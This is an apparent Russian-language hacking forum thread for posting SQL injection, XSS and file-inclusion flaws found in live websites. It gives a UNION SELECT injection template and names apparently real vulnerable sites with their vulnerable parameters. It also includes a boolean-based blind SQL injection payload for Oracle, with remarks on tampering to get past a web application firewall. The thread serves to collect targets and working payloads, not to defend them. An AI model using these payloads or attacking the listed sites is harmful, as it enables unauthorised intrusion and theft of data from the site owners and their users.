Список SQL,XSS,Include инъекций

[Tayler]

Тема для постинга найденных SQL,XSS,INCLUDE инъекций.
Прежде чем постить,проверьте, не выкладывалась ли она ранее.
Все ссылки должны быть заключены в теги [.code][/code] (Без точки)
Например:

site.ru/index.php?id=-1'+union+select+1,2,3,4,5,6,version(),8,9+--+

Спам,оффтоп будут наказываться!

 

[rtyn]

Tayler, есть пост такой же, как считаете мб объединить?

 

[Tayler]

Mason, почему бы и нет)

http://www.rybalka.ua/catalogue/index.php?cat_id=1'

 

[Tayler]

XSS в формах отправки отзывов.

http://www.nekljudov.ru/

 

[shadow]

Boolean-based blind SQL injection. Реализация так называемой слепой инъекции: данные из БД в «чистом» виде уязвимым веб-приложением нигде не возвращаются. Прием также называется дедуктивным. Sqlmap добавляет в уязвимый параметр HTTP-запроса синтаксически правильно составленное выражение, содержащее подзапрос SELECT (или любую другую команду для получения выборки из базы данных).
данный пайлоад прописан на СУБД Oracle, к нему так же применен скрипт tamper для обхода Waf ASCII, MSSQL, но байпас все равно надо дописывать вручную, т.к включен фильтр на ряд определенных функции в запросе

articles[402]=402&articles[378]=378&articles[676]=676&unit[articles][727]=727&articles[415]=342&articles[868]=921&combo[entity]=NL&unit[articles][249]=249&combo[billingTerm]=3&unit[articles][933]=933&articles[152]=153&unit[articles][932]=932'&combo[productClassId]=44&combo[id]=26378&combo[currency]=%26euro%3b') AND 6425=6425— JRtK&unit[id]=885&articles[606]=606&combo[quantity]=1